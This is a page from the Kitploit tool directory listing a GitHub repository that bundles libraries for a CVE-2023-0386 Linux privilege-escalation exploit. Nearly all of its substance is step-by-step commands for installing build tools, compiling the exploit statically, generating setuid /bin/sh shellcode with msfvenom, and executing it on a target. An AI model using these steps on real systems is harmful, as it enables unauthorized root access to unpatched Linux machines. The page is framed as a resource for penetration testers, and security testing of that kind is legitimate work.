Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-0386-libs — CVE-2023-0386 包含所需运行库 | Kitploit
Tools/GitHubGitHub/estamelgg/cve-2023-0386-libs
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingBinary Exploitation
GitHubestamelgg/cve-2023-0386-libs

CVE-2023-0386-libs

CVE-2023-0386 包含所需运行库

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Install compilation environment

root@kitploit:~
sudo apt install -y gcc libfuse-dev pkg-config

Compile exploit

root@kitploit:~
gcc -Wall CVE-2023-0386.c `pkg-config fuse --cflags --libs` -D_FILE_OFFSET_BITS=64 -o CVE-2023-0386-exp -static -lfuse

Generate shellcode

root@kitploit:~
msfvenom -p linux/x86/exec CMD=/bin/sh PrependSetuid=True -f elf -o shellcode.elf && xxd -i -c 8 shellcode.elf

xxd -i -c 8 shellcode.elf

Execute on target, no need to install gcc or other environment on the target

root@kitploit:~
chmod +x CVE-2023-0386-exp && ./CVE-2023-0386-exp
Download Tool